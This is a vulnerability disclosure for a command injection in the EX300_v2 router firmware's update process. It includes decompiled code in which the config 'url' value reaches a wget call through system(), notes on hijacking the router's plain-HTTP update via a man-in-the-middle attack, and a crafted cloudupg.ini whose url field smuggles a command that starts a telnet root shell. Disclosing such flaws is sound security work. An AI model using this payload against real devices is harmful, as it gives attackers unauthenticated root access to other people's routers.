Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Affected device

production: EX300_v2
version: V4.0.3c.140_B20210429

Vulnerability description

Vulnerability Type: RCE

A command injection was found in EX300_v2, V4.0.3c.140_B20210429. The update process forceugpof the router allows unauthenticated remote attackers to achieve remote code execution as root via a MitM attack.

forceugp will read the config file var/cloudupg.ini and try to download firmware. Here we can inject command in parament url.

  • forceugp
   ... 
   inifile_get_string("/var/cloudupg.ini", "INFO", "url", url);
 inifile_get_string("/var/cloudupg.ini", "INFO", "magicid", v4);
 v0 = 3;
 if ( (unsigned int)strlen(url) < 0xA )
   return -1;
 while ( 1 )
 {
   sprintf(v2, "wget -O %s  %s", "/var/uImage.img", url); //命令注入
   system(v2);
   sprintf(v2, "md5sum %s | cut -d ' ' -f1", "/var/uImage.img");
   getCmdStr(v2, v6, 33);
  • post to firmware server to check new firmware

Since device requests by HTTP, so we can hijack dns request , the repeater will connect to the attacker server instead of legal one.

  • /var/cloudupg.ini
[status]
status                         = 4
netcheck                       = 0
timestamp                      = 1636514189
download                       = 2
checkend                       = 1
parameter                      = 1

[info]
version                        = hacked.hacked
magicid                        = pass
aprule                         =
time                           = 1
mode                           = 1
url                            = &telnetd -l/bin/sh -p 23333& 2>dev/null&